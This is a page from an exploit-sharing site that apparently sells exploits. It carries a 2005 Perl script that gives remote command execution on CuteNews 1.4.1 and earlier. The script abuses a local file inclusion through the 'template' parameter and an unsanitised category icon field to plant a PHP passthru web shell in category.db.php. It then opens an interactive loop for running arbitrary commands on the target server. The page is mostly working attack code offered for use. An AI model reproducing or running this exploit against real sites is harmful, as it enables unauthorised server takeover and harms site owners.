0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit
[===================================================================
CuteNews <= 1.4.1 (categories.mdu) Remote Command Execution Exploit
===================================================================
#!/usr/bin/perl
#
# cijfer-cnxpl - CuteNews <=1.4.1 Remote Command Execution
#
# Copyright (c) 2005 cijfer <cijfer@netti.fi>
# All rights reserved.
#
## 1. example
#
# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
# [cijfer@www.xxxx.org /]$ id;uname -a
# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
# [cijfer@www.xxxx.org /]$
#
## 2. explanation
#
# this particular vulnerability is already known (sort of). a
# bug as exact as this one was found by rgod in CuteNews. the
# sole difference between his and my bug, are the files that
# are being exploited. while his was a bug using the following
# string:
#
# show_archives.php?template=../inc/ipban.mdu%00
#
# i found my bug in:
#
# show_archives.php?template=../inc/categories.mdu%00
#
## 3. the bug
#
# the bug lies in categories.mdu, located in the /inc/ folder
# of the cutenews directory.
#
# by using the 'template' variable in show_archives.php, we
# can include any local files. in this case, we're including
# categories.mdu. why? every .mdu file within the cutenews
# package has raw PHP code within it, that is not protected
# like the normal .php files.
#
# $template gets sanitized, but can be bypassed depending on
# php configuration! this is why on some 1.4.0's it works and
# on some others it does not. it all depends on configuration
# and whether or not register_globals needs to be on.
#
# if(file_exists("$cutepath/data/${template}.tpl")){ require("$cutepath/data/${template}.tpl"); }
# ...
#
# looking into categories.mdu, we notice the following to
# create our exploit string:
#
# if($member_db[1] != 1){ msg("error", "Access Denied", "You don't have permission to edit categories"); }
# ...
#
# elseif($action == "doedit")
# {
# ...
#
# cannot write arbitrary php code to $cat_name :(
#
# $cat_name = htmlspecialchars(stripslashes($cat_name));
# ...
#
# $cat_icon lacks sanitization :))!
#
# fwrite($new_cats, "$catid|$cat_name|$cat_icon|||\n");
# ...
#
# adding together all these elements, it is possible to inject
# php code into data/category.db.php and from there, use our
# injected code to either include a remote php shell, or run
# commands on the system.
#
##
#
# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $
use IO::Socket;
use Getopt::Std;
use URI::Escape;
getopts("h:d:");
$host = $opt_h;
$dirs = $opt_d;
$good = 0;
if(!$host)
{
print "cijfer-cnxpl.pl by cijfer\n";
print "usage: $0 -h <hostname> -d [/directory]\r\n";
exit();
}
while()
{
print "[cijfer@".$host." /]\$ ";
while(<STDIN>)
{
$cmds=$_;
chomp($cmds);
last;
}
if(!$dirs)
{
$dirs = "/cutenews";
}
$string = $dirs;
$string .= "/show_archives.php?template=../inc/categories.mdu%00";
$string .= "&member_db[1]=1";
$string .= "&action=doedit"; #can be changed from 'doedit' to 'add' if no categories exist
$string .= "&cat_name=cijfer";
$string .= "&catid=1"; #can be changed to different value if starting catid != 0
$string .= "&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E";
$cijfer = $dirs;
$cijfer .= "/data/category.db.php?cij=";
$cijfer .= uri_escape("echo; ");
$cijfer .= "%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"; # _START_
$cijfer .= uri_escape($cmds);
$cijfer .= "%3B%20%65%63%68%6F%20%5F%45%4E%44%5F"; # _END_
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
print $sock "GET $string HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";
print $sock "GET $cijfer HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";
while($result = <$sock>)
{
if($sock =~ /^403/)
{
print "error: 403\n";
exit();
}
if($result =~ /^_END_/)
{
$good=0;
}
if($good==1)
{
print $result;
}
if($result =~ /^_START_/)
{
$good=1;
}
}
}
# 0day.today [2024-12-23] #